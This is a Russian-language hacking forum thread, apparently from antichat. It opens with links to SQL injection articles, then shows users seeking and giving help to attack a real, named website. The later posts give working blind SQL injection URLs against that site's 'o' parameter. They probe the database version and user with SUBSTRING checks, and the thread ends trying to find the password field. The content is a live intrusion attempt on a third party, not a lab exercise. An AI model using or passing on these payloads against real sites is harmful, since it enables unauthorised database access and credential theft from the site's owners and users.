Вот в общем на milw0rm'е: http://milw0rm.com/papers/260 Довольно свежая статья от M4g,а: http://www.xakep.ru/post/49508/default.asp Замечание от .Slip'а: https://forum.antichat.ru/thread99589.html Вот заметка от Raz0r'а: http://raz0r.name/articles/null-byte-alternative/ Вот от [x26]VOLAND: https://forum.antichat.ru/thread119481.html Так-же в FAQ от jokester'а: https://forum.antichat.ru/thread104591.html
Сам поищешь, или собрать для тебя по группам? Там карта раздела есть https://forum.antichat.ru/forum30.html
Я в деле sqlinj еще нуб, не так давно начал изучать работу с БД, так что прошу сильно не пинать В общем есть один сайтег, пытаюсь провести инжекцию добавлением в пост запрос полей username и password значения value="1'", но страница загружается так как будто данные не введены или введены но не верны, также пытался в поле пароля вставить символ %. Результат тот же. Попробовал вписать в value="admin'<?php echo 123; ?>';" Результат тот же. Отсюда делаю вывод, что символ ' экранируется. Кто что может еще предложить сделать
Сканер сказал, что в http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ возможна инъекция, но что я не пишу в запрос - в ответ ничего. Помогите, пожалуйста, советом.
Это называется blind -sql -inj то есть при правильном запросе у тебя выдаст страницу которая должна быть, при не правильном , в твоем случае , вообще ни чего. то есть при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+ выдаст страницу , а при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=4+--+ ни чего не выводит,
Всё просто, в текущей БД database нет таблицы tabla _ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+
Patrik, _http://forum.antichat.ru/thread119047.html , _https://forum.antichat.ru/threadnav35207-1-10.html
_http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100-- Пол царства за имя поля с паролем